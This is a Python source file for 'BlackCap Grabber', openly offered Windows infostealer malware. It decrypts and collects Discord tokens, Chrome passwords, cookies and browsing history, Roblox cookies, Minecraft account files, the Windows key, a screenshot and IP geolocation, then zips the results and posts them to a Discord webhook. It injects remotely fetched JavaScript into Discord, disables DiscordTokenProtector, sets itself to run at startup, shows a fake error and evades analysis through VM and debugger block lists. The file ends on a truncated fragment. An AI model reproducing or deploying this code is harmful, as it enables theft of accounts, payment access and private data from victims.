BlackCap-Grabber/index.py

import asyncio
import json
import ntpath
import os
import random
import re
import shutil
import sqlite3
import subprocess
import threading
import winreg
import zipfile
import httpx
import psutil
import win32gui
import win32con
import base64
import requests
import ctypes
import time


from sqlite3 import connect
from base64 import b64decode
from urllib.request import Request, urlopen
from shutil import copy2
from datetime import datetime, timedelta, timezone
from sys import argv
from tempfile import gettempdir, mkdtemp
from json import loads, dumps
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from Crypto.Cipher import AES
from PIL import ImageGrab
from win32crypt import CryptUnprotectData


local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
regex = base64.b64encode(
    b'W01OXVtBLVphLXpcZF17MjN9XC5bXHctXXs2fVwuW1x3LV17Mjd9');
Passw = [];

# `
#    "yourwebhookurl" = your discord webhook url
#    "blackcap_inject_url" = my javascript injection (i recommand to not change)
#    "hide" = you want to hide grabber? ('yes' or 'no')
#    "dbugkiller" = recommand to let this
#    "blprggg" = don't touch at this
#
# `



__config__ = {
    'yourwebhookurl': "%WEBHOOK_HERE%",
    'blackcap_inject_url': "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Inject/main/index.js",
    'hide': '%_hide_script%',
    'ping': '%ping_enabled%',
    'pingtype': '%ping_type%',
    'fake_error':'%_error_enabled%',
    'startup': '%_startup_enabled%',
    'kill_discord_process': "%kill_discord_process%",
    'dbugkiller': '%_debugkiller%',
    'blprggg':
    [
        "httpdebuggerui",
        "wireshark",
        "fiddler",
        "regedit",
        "cmd",
        "taskmgr",
        "vboxservice",
        "df5serv",
        "processhacker",
        "vboxtray",
        "vmtoolsd",
        "vmwaretray",
        "ida64",
        "ollydbg",
        "pestudio",
        "vmwareuser",
        "vgauthservice",
        "vmacthlp",
        "x96dbg",
        "vmsrvc",
        "x32dbg",
        "vmusrvc",
        "prl_cc",
        "prl_tools",
        "xenservice",
        "qemu-ga",
        "joeboxcontrol",
        "ksdumperclient",
        "ksdumper",
        "joeboxserver"
    ]

}


infocom = os.getlogin()
vctm_pc = os.getenv("COMPUTERNAME")
r4m = str(psutil.virtual_memory()[0] / 1024 ** 3).split(".")[0]
d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0]


class Functions(object):

    @staticmethod
    def gtmk3y(path: str or os.PathLike):
        if not ntpath.exists(path):
            return None
        with open(path, "r", encoding="utf-8") as f:
            c = f.read()
        local_state = json.loads(c)

        try:
            master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
            return Functions.w1nd0_dcr(master_key[5:])
        except KeyError:
            return None

    @staticmethod
    def cnverttim(time: int or float) -> str:
        try:
            epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
            codestamp = epoch + timedelta(microseconds=time)
            return codestamp
        except Exception:
            pass

    @staticmethod
    def w1nd0_dcr(encrypted_str: bytes) -> str:
        return CryptUnprotectData(encrypted_str, None, None, None, 0)[1]

    @staticmethod
    def cr34t3_f1lkes(_dir: str or os.PathLike = gettempdir()):
        f1lenom = ''.join(random.SystemRandom().choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for _ in range(random.randint(10, 20)))
        path = ntpath.join(_dir, f1lenom)
        open(path, "x")
        return path

    @staticmethod
    def dcrpt_val(buff, master_key) -> str:
        try:
            iv = buff[3:15]
            payload = buff[15:]
            cipher = AES.new(master_key, AES.MODE_GCM, iv)
            decrypted_pass = cipher.decrypt(payload)
            decrypted_pass = decrypted_pass[:-16].decode()
            return decrypted_pass
        except Exception:
            return f'Failed to decrypt "{str(buff)}" | key: "{str(master_key)}"'

    @staticmethod
    def g3t_H(token: str = None):
        headers = {
            "Content-Type": "application/json",
        }
        if token:
            headers.update({"Authorization": token})
        return headers

    @staticmethod
    def sys_1fo() -> list:
        flag = 0x08000000
        sh1 = "wmic csproduct get uuid"
        sh2 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        sh3 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
        try:
            uuidwndz = subprocess.check_output(sh1, creationflags=flag).decode().split('\n')[1].strip()
        except Exception:
            uuidwndz = "N/A"
        try:
            w1nk33y = subprocess.check_output(sh2, creationflags=flag).decode().rstrip()
        except Exception:
            w1nk33y = "N/A"
        try:
            w1nv3r = subprocess.check_output(sh3, creationflags=flag).decode().rstrip()
        except Exception:
            w1nv3r = "N/A"
        return [uuidwndz, w1nv3r, w1nk33y]


    @staticmethod
    def net_1fo() -> list:
        ip, city, country, region, org, loc, googlemap = "None", "None", "None", "None", "None", "None", "None"
        req = httpx.get("https://ipinfo.io/json")
        if req.status_code == 200:
            data = req.json()
            ip = data.get('ip')
            city = data.get('city')
            country = data.get('country')
            region = data.get('region')
            org = data.get('org')
            loc = data.get('loc')
            googlemap = "https://www.google.com/maps/search/google+map++" + loc
        return [ip, city, country, region, org, loc, googlemap]

    @staticmethod
    def fetch_conf(e: str) -> str or bool | None:
        return __config__.get(e)





class bl4ckc4p(Functions):
    def __init__(self):
        
        self.dscap1 = "https://discord.com/api/v9/users/@me"

        self.w3bh00k = self.fetch_conf('yourwebhookurl')

        self.hide = self.fetch_conf("hide")

        self.pingtype = self.fetch_conf("pingtype")

        self.pingonrun = self.fetch_conf("ping")

        self.startupexe = self.fetch_conf("startup")
        
        self.fake_error = self.fetch_conf("fake_error")

        self.appdata = os.getenv("localappdata")

        self.roaming = os.getenv("appdata")
        
        self.chrmmuserdtt = ntpath.join(self.appdata, 'Google', 'Chrome', 'User Data')

        self.dir, self.temp = mkdtemp(), gettempdir()

        inf, net = self.sys_1fo(), self.net_1fo()

        self.uuidwndz, self.w1nv3r, self.w1nk33y = inf[0], inf[1], inf[2]

        self.ip, self.city, self.country, self.region, self.org, self.loc, self.googlemap = net[0], net[1], net[2], net[3], net[4], net[5], net[6]

        self.srtupl0c = ntpath.join(self.roaming, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')



        self.h00ksreg = "api/webhooks"

        self.chrmrgx = re.compile(r'(^profile\s\d*)|default|(guest profile$)', re.IGNORECASE | re.MULTILINE);
        
        self.rgxexmp = regex;

        self.ecrprgxx = r"dQw4w9WgXcQ:[^\"]*";


        self.sep = os.sep;

        self.tokens = [];

        self.robloxcookies = [];

        self.chrome_key = self.gtmk3y(ntpath.join(self.chrmmuserdtt, "Local State"));


        os.makedirs(self.dir, exist_ok=True);


    def hiding(self: str) -> str:
        if self.hide == "yes":
            hide = win32gui.GetForegroundWindow()
            win32gui.ShowWindow(hide, win32con.SW_HIDE)

    def fakeerror(self: str) -> str:
        if self.fake_error == "yes":
            ctypes.windll.user32.MessageBoxW(None, 'Error code: BlackCap_0x988958\nSomething gone wrong.', 'Fatal Error', 0)

    def pingonrunning(self: str) -> str:
        ping1 = {
            'avatar_url': 'https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png',
            'content': "@everyone"
            }
        ping2 = {
            'avatar_url': 'https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png',
            'content': "@here"
            }
        if self.pingonrun == "yes":
            if self.h00ksreg in self.w3bh00k:
                if self.pingtype == "@everyone" or self.pingtype == "everyone":
                    httpx.post(self.w3bh00k, json=ping1)
            if self.pingtype == "@here" or self.pingtype == "here":
                if self.h00ksreg in self.w3bh00k :
                    httpx.post(self.w3bh00k, json=ping2)



    def startupblackcap(self: str) -> str:
        if self.startupexe == "yes":
            startup_path = os.getenv("appdata") + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
            if os.path.exists(startup_path + argv[0]):
                os.remove(startup_path + argv[0])
                copy2(argv[0], startup_path)
            else:
                copy2(argv[0], startup_path)


    def _bexit(self):
        shutil.rmtree(self.dir, ignore_errors=True)
        os._exit(0)

    def trexctrac(func):
        '''Decorator to safely catch and ignore exceptions'''
        def wrapper(*args, **kwargs):
            try:
                func(*args, **kwargs)
            except Exception:
                pass
        return wrapper

    async def init(self):

        if self.w3bh00k == "" or self.w3bh00k == "\x57EBHOOK_HERE":
            self._bexit()
            
        self.hiding()
        self.fakeerror()
        self.pingonrunning()
        self.startupblackcap()

        if self.fetch_conf('dbugkiller') and AntiDebug().inVM is True:

            self._bexit()
        await self.bypbd()
        await self.byptknp()

        function_list = [self.scrinsh, self.sysd1, self.grbtkn, self.grbmc, self.grbr0blx]


        if self.fetch_conf('kill_discord_process'):

            await self.kllprcsx()


        if ntpath.exists(self.chrmmuserdtt) and self.chrome_key is not None:
            os.makedirs(ntpath.join(self.dir, 'Google'), exist_ok=True)
            function_list.extend([self.grbpsw, self.grbcoke, self.grbhis])

        for func in function_list:
            process = threading.Thread(target=func, daemon=True)
            process.start()
        for t in threading.enumerate():
            try:
                t.join()
            except RuntimeError:
                continue
        self.ntfytkn()
        await self._1ject()
        self.ending()

    
    async def ch3ktkn(self, tkn: str) -> str:
        try:
            r = httpx.get(
                url=self.dscap1,
                headers=self.g3t_H(tkn),
                timeout=5.0
            )
        except (httpx.ConnectTimeout, httpx.TimeoutException):
            pass
        if r.status_code == 200 and tkn not in self.tokens:
            self.tokens.append(tkn)
            

    async def _1ject(self):
        # TO DO: reduce cognetive complexity
        for _dir in os.listdir(self.appdata):

            if 'discord' in _dir.lower():
                discord = self.appdata + os.sep + _dir
                for __dir in os.listdir(ntpath.abspath(discord)):

                    if re.match(r'app-(\d*\.\d*)*', __dir):
                        app = ntpath.abspath(ntpath.join(discord, __dir))
                        modules = ntpath.join(app, 'modules')


                        if not ntpath.exists(modules):
                            return


                        for ___dir in os.listdir(modules):

                            if re.match(r"discord_desktop_core-\d+", ___dir):
                                inj_path = modules + os.sep + ___dir + f'\\discord_desktop_core\\'

                                if ntpath.exists(inj_path):

                                    if self.srtupl0c not in argv[0]:
                                        try:
                                            os.makedirs(inj_path + 'blackcap', exist_ok=True)
                                        except PermissionError:
                                            pass

                                    if self.h00ksreg in self.w3bh00k:
                                        f = httpx.get(self.fetch_conf('blackcap_inject_url')).text.replace("%WEBHOOK%", self.w3bh00k)
                                    
                                    try:
                                        with open(inj_path + 'index.js', 'w', errors="ignore") as indexFile:
                                            indexFile.write(f)
                                    except PermissionError:
                                        pass

                                    if self.fetch_conf('kill_discord_process'):
                                        os.startfile(app + self.sep + _dir + '.exe')

    async def byptknp(self):
        tp = f"{self.roaming}\\DiscordTokenProtector\\"
        if not ntpath.exists(tp):
            return
        config = tp + "config.json"

        for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]:
            try:
                os.remove(tp + i)
            except FileNotFoundError:
                pass
        if ntpath.exists(config):
            with open(config, errors="ignore") as f:
                try:
                    item = json.load(f)
                except json.decoder.JSONDecodeError:
                    return
                item['ksch_is_here'] = "https://github.com/KSCHdsc"
                item['auto_start'] = False
                item['auto_start_discord'] = False
                item['integrity'] = False
                item['integrity_allowbetterdiscord'] = False
                item['integrity_checkexecutable'] = False
                item['integrity_checkhash'] = False
                item['integrity_checkmodule'] = False
                item['integrity_checkscripts'] = False
                item['integrity_checkresource'] = False
                item['integrity_redownloadhashes'] = False
                item['iterations_iv'] = 364
                item['iterations_key'] = 457
                item['version'] = 69420
            with open(config, 'w') as f:
                json.dump(item, f, indent=2, sort_keys=True)
            with open(config, 'a') as f:
                f.write("\n\n//KSCH_is_here | https://github.com/KSCHdsc")

    async def kllprcsx(self):
        bllist = self.fetch_conf('blprggg')
        for i in ['discord', 'discordtokenprotector', 'discordcanary', 'discorddevelopment', 'discordptb']:
            bllist.append(i)
        for proc in psutil.process_iter():
            if any(procstr in proc.name().lower() for procstr in bllist):
                try:
                    proc.kill()
                except (psutil.NoSuchProcess, psutil.AccessDenied):
                    pass


    async def bypbd(self):
        bd = self.roaming + "\\BetterDiscord\\data\\betterdiscord.asar"
        if ntpath.exists(bd):
            x = self.h00ksreg
            with open(bd, 'r', encoding="cp437", errors='ignore') as f:
                txt = f.read()
                content = txt.replace(x, 'KSCHishere')
            with open(bd, 'w', newline='', encoding="cp437", errors='ignore') as f:
                f.write(content)

    @trexctrac
    def grbtkn(self):
        passee = {
            'Discord': self.roaming + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': self.roaming + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': self.roaming + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': self.roaming + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Chrome SxS': self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Chrome': self.chrmmuserdtt + '\\Default\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
            'Uran': self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for name, path in passee.items():

            if not ntpath.exists(path):
                continue

            disc = name.replace(" ", "").lower()

            if "cord" in path:

                if ntpath.exists(self.roaming + f'\\{disc}\\Local State'):
                    for f1lenom in os.listdir(path):

                        if f1lenom[-3:] not in ["log", "ldb"]:
                            continue

                        for line in [x.strip() for x in open(f'{path}\\{f1lenom}', errors='ignore').readlines() if x.strip()]:

                            for y in re.findall(self.ecrprgxx, line):
                                token = self.dcrpt_val(b64decode(y.split('dQw4w9WgXcQ:')[1]), self.gtmk3y(self.roaming + f'\\{disc}\\Local State'))
                                asyncio.run(self.ch3ktkn(token))

            else:
                for f1lenom in os.listdir(path):
                    if f1lenom[-3:] not in ["log", "ldb"]:
                        continue
                    for line in [x.strip() for x in open(f'{path}\\{f1lenom}', errors='ignore').readlines() if x.strip()]:
                        for token in re.findall(self.rgxexmp, line):
                            asyncio.run(self.ch3ktkn(token))


        if ntpath.exists(self.roaming + "\\Mozilla\\Firefox\\Profiles"):

            for path, _, files in os.walk(self.roaming + "\\Mozilla\\Firefox\\Profiles"):

                for _file in files:
                    if not _file.endswith('.sqlite'):
                        continue

                    for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]:
                        for token in re.findall(self.rgxexmp, line):
                            asyncio.run(self.ch3ktkn(token))

    @trexctrac
    def grbpsw(self):
        f = open(ntpath.join(self.dir, 'Google', 'Passwords.txt'), 'w', encoding="cp437", errors='ignore')
        for prof in os.listdir(self.chrmmuserdtt):
            if re.match(self.chrmrgx, prof):
                login_db = ntpath.join(self.chrmmuserdtt, prof, 'Login Data')
                login = self.cr34t3_f1lkes()

                shutil.copy2(login_db, login)
                conn = sqlite3.connect(login)
                cursor = conn.cursor()
                cursor.execute("SELECT action_url, username_value, password_value FROM logins")

                for r in cursor.fetchall():
                    url = r[0]
                    username = r[1]
                    encrypted_password = r[2]
                    decrypted_password = self.dcrpt_val(encrypted_password, self.chrome_key)
                    if url != "":
                        f.write(f"URL: {url}\nID: {username}\nPASSW0RD: {decrypted_password}\n\n")

                cursor.close()
                conn.close()
                os.remove(login)
        f.close()



    @trexctrac
    def grbcoke(self):
        f = open(ntpath.join(self.dir, 'Google', 'Cookies.txt'), 'w', encoding="cp437", errors='ignore')
        for prof in os.listdir(self.chrmmuserdtt):

            if re.match(self.chrmrgx, prof):

                login_db = ntpath.join(self.chrmmuserdtt, prof, 'Network', 'cookies')
                login = self.cr34t3_f1lkes()


                shutil.copy2(login_db, login)
                conn = sqlite3.connect(login)
                cursor = conn.cursor()
                cursor.execute("SELECT host_key, name, encrypted_value from cookies")

                for r in cursor.fetchall():
                    host = r[0]
                    user = r[1]
                    decrypted_cookie = self.dcrpt_val(r[2], self.chrome_key)
                    if host != "":
                        f.write(f"HOST KEY: {host} | NAME: {user} | VALUE: {decrypted_cookie}\n")
                    if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_' in decrypted_cookie:
                        self.robloxcookies.append(decrypted_cookie)

                cursor.close()
                conn.close()
                os.remove(login)
        f.close()


    @trexctrac
    def grbhis(self):
        f = open(ntpath.join(self.dir, 'Google', 'History.txt'), 'w', encoding="cp437", errors='ignore')

        def xtractwbhist(db_cursor):
            web = ""
            db_cursor.execute('SELECT title, url, last_visit_time FROM urls')
            for item in db_cursor.fetchall():
                web += f"Search Title: {item[0]}\nURL: {item[1]}\nLAST VISIT TIME: {self.cnverttim(item[2]).strftime('%Y/%m/%d - %H:%M:%S')}\n\n"
            return web


        def xtractwbs3rch(db_cursor):
            db_cursor.execute('SELECT term FROM keyword_search_terms')
            search_terms = ""

            for item in db_cursor.fetchall():
                if item[0] != "":
                    search_terms += f"{item[0]}\n"

            return search_terms


        for prof in os.listdir(self.chrmmuserdtt):

            if re.match(self.chrmrgx, prof):

                login_db = ntpath.join(self.chrmmuserdtt, prof, 'History')
                login = self.cr34t3_f1lkes()

                shutil.copy2(login_db, login)
                conn = sqlite3.connect(login)
                cursor = conn.cursor()


                search_history = xtractwbs3rch(cursor)
                web_history = xtractwbhist(cursor)

                f.write(f"{' '*17}SEARCH\n{'-'*50}\n{search_history}\n{' '*17}\n\nLinks History\n{'-'*50}\n{web_history}")

                cursor.close()
                conn.close()
                os.remove(login)
        f.close()


    def ntfytkn(self):

        f = open(self.dir + "\\Discord_Info.txt", "w", encoding="cp437", errors='ignore')

        for token in self.tokens:
            j = httpx.get(self.dscap1, headers=self.g3t_H(token)).json()
            user = j.get('username') + '#' + str(j.get("discriminator"))

            badges = ""
            flags = j['flags']
            if (flags == 1):
                badges += "Staff, "
            if (flags == 2):
                badges += "Partner, "
            if (flags == 4):
                badges += "Hypesquad Event, "
            if (flags == 8):
                badges += "Green Bughunter, "
            if (flags == 64):
                badges += "Hypesquad Bravery, "
            if (flags == 128):
                badges += "HypeSquad Brillance, "
            if (flags == 256):
                badges += "HypeSquad Balance, "
            if (flags == 512):
                badges += "Early Supporter, "
            if (flags == 16384):
                badges += "Gold BugHunter, "
            if (flags == 131072):
                badges += "Verified Bot Developer, "
            if (badges == ""):
                badges = "None"

            email = j.get("email")
            phone = j.get("phone") if j.get("phone") else "No Phone Number attached"
            nitro_data = httpx.get(self.dscap1 + '/billing/subscriptions', headers=self.g3t_H(token)).json()
            has_nitro = False
            has_nitro = bool(len(nitro_data) > 0)
            billing = bool(len(json.loads(httpx.get(self.dscap1 + "/billing/payment-sources", headers=self.g3t_H(token)).text)) > 0)


            f.write(f"{' '*17}{user}\n{'-'*50}\nBilling?: {billing}\nNitro Type: {has_nitro}\nBadges: {badges}\nPhone: {phone}\nToken: {token}\nEmail: {email}\n\n")
        f.close()


    def grbmc(self):
        minecraftpath = ntpath.join(self.dir, 'Minecraft')
        os.makedirs(minecraftpath, exist_ok=True)
        mc = ntpath.join(self.roaming, '.minecraft')


        tgrb = ['launcher_accounts.json', 'launcher_profiles.json', 'usercache.json', 'launcher_log.txt']


        for _file in tgrb:
            if ntpath.exists(ntpath.join(mc, _file)):
                shutil.copy2(ntpath.join(mc, _file), minecraftpath + self.sep + _file)

                

    def grbr0blx(self):
        def subproc(path):
            try:
                return subprocess.check_output(
                    fr"powershell Get-ItemPropertyValue -Path {path}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
                    creationflags=0x08000000).decode().rstrip()
            except Exception:
                return None
        reg_cookie = subproc(r'HKLM')
        if not reg_cookie:
            reg_cookie = subproc(r'HKCU')
        if reg_cookie:
            self.robloxcookies.append(reg_cookie)
        if self.robloxcookies:
            with open(self.dir + "\\Roblox_Cookies.txt", "w") as f:
                for i in self.robloxcookies:
                    f.write(i + '\n')

    def scrinsh(self):
        image = ImageGrab.grab(
            bbox=None,
            include_layered_windows=False,
            all_screens=True,
            xdisplay=None
        )
        image.save(self.dir + "\\Screenshot.png")
        image.close()

    def sysd1(self):
        about = f"""
{infocom} | {vctm_pc}
Windows key: {self.w1nk33y}
Windows version: {self.w1nv3r}
RAM: {r4m}GB
DISK: {d1sk}GB
HWID: {self.uuidwndz}
IP: {self.ip}
City: {self.city}
Country: {self.country}
Region: {self.region}
Org: {self.org}
GoogleMaps: {self.googlemap}
        """
        with open(self.dir + "\\System_Info.txt", "w", encoding="utf-8", errors='ignore') as f:
            f.write(about)







    def ending(self):
        for i in os.listdir(self.dir):
            if i.endswith('.txt'):
                path = self.dir + self.sep + i
                with open(path, "r", errors="ignore") as ff:
                    x = ff.read()
                    if not x:
                        ff.close()
                        os.remove(path)
                    else:
                        with open(path, "w", encoding="utf-8", errors="ignore") as f:
                            f.write("Black Cap Create By KS.H | https://github.com/KSCHdsc\n\n")
                        with open(path, "a", encoding="utf-8", errors="ignore") as fp:
                            fp.write(x + "\n\nBlack Cap Create By KSCH | https://github.com/KSCHdsc")

        _zipfile = ntpath.join(self.appdata, f'BC-[{infocom}].zip')
        zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED)
        abs_src = ntpath.abspath(self.dir)
        for dirname, _, files in os.walk(self.dir):
            for filename in files:
                absname = ntpath.abspath(ntpath.join(dirname, filename))
                arcname = absname[len(abs_src) + 1:]
                zipped_file.write(absname, arcname)
        zipped_file.close()

        file_count, files_found, tokens = 0, '', ''
        for _, __, files in os.walk(self.dir):
            for _file in files:
                files_found += f"・{_file}\n"
                file_count += 1
        for tkn in self.tokens:
            tokens += f'{tkn}\n\n'
        fileCount = f"{file_count} Files Found: "

        embed = {
            'name': "Blackcap",
            'avatar_url': 'https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png',
            'embeds': [
                {
                    'author': {
                        'name': f'Black - Cap v2.1',
                        'url': 'https://github.com/KSCHdsc',
                        'icon_url': 'https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif'
                    },
                    'color': 374276,
                    'description': f'[Black - Cap has Geo Localised this guy]({self.googlemap})',
                    'fields': [
                        {
                            'name': '\u200b',
                            'value': f'''```fix
                                IP:᠎ {self.ip.replace(" ", "᠎ ") if self.ip else "N/A"}
                                Org:᠎ {self.org.replace(" ", "᠎ ") if self.org else "N/A"}
                                City:᠎ {self.city.replace(" ", "᠎ ") if self.city else "N/A"}
                                Region:᠎ {self.region.replace(" ", "᠎ ") if self.region else "N/A"}
                                Country:᠎ {self.country.replace(" ", "᠎ ") if self.country else "N/A"}```
                            '''.replace(' ', ''),
                            'inline': True
                        },
                        {
                            'name': '\u200b',
                            'value': f'''```fix
                                Computer Name: {vctm_pc.replace(" ", "᠎ ")}
                                Windows Key:᠎ {self.w1nk33y.replace(" ", "᠎ ")}
                                Windows Ver:᠎ {self.w1nv3r.replace(" ", "᠎ ")}
                                Disk Stockage:᠎ {d1sk}GB
                                Ram Stockage:᠎ {r4m}GB```
                            '''.replace(' ', ''),
                            'inline': True
                        },
                        {
                            'name': '**- Tokens:**',
                            'value': f'''```yaml
                                {tokens if tokens else "tokens not found"}```
                            '''.replace(' ', ''),
                            'inline': False
                        },
                        {
                            'name': fileCount,
                            'value': f'''```ini
                                [
                                {files_found.strip()}
                                ]```
                            '''.replace(' ', ''),
                            'inline': False
                        }
                    ],
                    'footer': {
                        'text': 'Black Cap Create By KSCH・https://github.com/KSCHdsc'
                    }
                }
            ]
        }


        with open(_zipfile, 'rb') as f:
            if self.h00ksreg in self.w3bh00k:
                httpx.post(self.w3bh00k, json=embed)
                httpx.post(self.w3bh00k, files={'upload_file': f})
        os.remove(_zipfile)



class AntiDebug(Functions):
    inVM = False

    def __init__(self):
        self.processes = list()

        self.bluseurs = [
            "WDAGUtilityAccount", "Robert", "Abby", "Peter Wilson", "hmarc", "patex", "JOHN-PC", "RDhJ0CNFevzX", "kEecfMwgj", "Frank", "8Nl0ColNQ5bq",
            "Lisa", "John", "george", "PxmdUOpVyx", "8VizSM", "w0fjuOVmCcP5A", "lmVwjj9b", "PqONjHVwexsS", "3u2v9m8", "Julia", "HEUeRzl",
        ]
        self.blpcname = [
            "DESKTOP-CDLNVOQ", "BEE7370C-8C0C-4", "DESKTOP-NAKFFMT", "WIN-5E07COS9ALR", "B30F0242-1C6A-4", "DESKTOP-VRSQLAG", "Q9IATRKPRH", "XC64ZB", "DESKTOP-D019GDM",
            "DESKTOP-WI8CLET", "SERVER1", "LISA-PC", "JOHN-PC", "DESKTOP-B0T93D6", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "WILEYPC", "WORK", "6C4E733F-C2D9-4",
            "RALPHS-PC", "DESKTOP-WG3MYJS", "DESKTOP-7XC6GEZ", "DESKTOP-5OV9S0O", "QarZhrdBpj", "ORELEEPC", "ARCHIBALDPC", "JULIA-PC", "d1bnJkfVlH",
        ]
        self.blhwid = [
            "7AB5C494-39F5-4941-9163-47F54D6D5016", "032E02B4-0499-05C3-0806-3C0700080009", "03DE0294-0480-05DE-1A06-350700080009",
            "11111111-2222-3333-4444-555555555555", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548",
            "4C4C4544-0050-3710-8058-CAC04F59344A", "00000000-0000-0000-0000-AC1F6BD04972", "79AF5279-16CF-4094-9758-F88A616D81B4",
            "5BD24D56-789F-8468-7CDC-CAA7222CC121", "49434D53-0200-9065-2500-65902500E439", "49434D53-0200-9036-2500-36902500F022",
            "777D84B3-88D1-451C-93E4-D235177420A7", "49434D53-0200-9036-2500-369025000C65", "B1112042-52E8-E25B-3655-6A4F54155DBF",
            "00000000-0000-0000-0000-AC1F6BD048FE", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "A15A930C-8251-9645-AF63-E45AD728C20C",
            "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670",
            "44B94D56-65AB-DC02-86A0-98143A7423BF", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A",
            "49434D53-0200-9036-2500-369025003AF0", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",
        ]

        for func in [self.lstchec, self.regkey, self.sp3cCheq]:
            process = threading.Thread(target=func, daemon=True)
            self.processes.append(process)
            process.start()
        for t in self.processes:
            try:
                t.join()
            except RuntimeError:
                continue

    def programExit(self):
        self.__class__.inVM = True

    def lstchec(self):
        for path in [r'D:\Tools', r'D:\OS2', r'D:\NT3X']:
            if ntpath.exists(path):
                self.programExit()

        for user in self.bluseurs:
            if infocom == user:
                self.programExit()

        for pcName in self.blpcname:
            if vctm_pc == pcName:
                self.programExit()

        for uuidwndz in self.blhwid:
            if self.sys_1fo()[0] == uuidwndz:
                self.programExit()

    def sp3cCheq(self):
        if int(r4m) <= 3: 
            self.programExit()
        if int(d1sk) <= 120:  
            self.programExit()
        if int(psutil.cpu_count()) <= 1:
            self.programExit()

    def regkey(self):
        reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
        reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")
        if (reg1 and reg2) != 1:
            self.programExit()

        handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
        try:
            reg_val = winreg.QueryValueEx(handle, '0')[0]
            if ("VMware" or "VBOX") in reg_val:
                self.programExit()
        finally:
            winreg.CloseKey(handle)
            
            







if __name__ == "__main__" and os.name == "nt":
    asyncio.run(bl4ckc4p().init())


local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []

def fetch_conf(e: str) -> str or bool | None:
        return __config__.get(e)

hook = fetch_conf("yourwebhookurl")

class DATA_BLOB(Structure):
    _fields_ = [
        ('cbData', wintypes.DWORD),
        ('pbData', POINTER(c_char))
    ]

def GetData(blob_out):
    cbData = int(blob_out.cbData)
    pbData = blob_out.pbData
    buffer = c_buffer(cbData)
    cdll.msvcrt.memcpy(buffer, pbData, cbData)
    windll.kernel32.LocalFree(pbData)
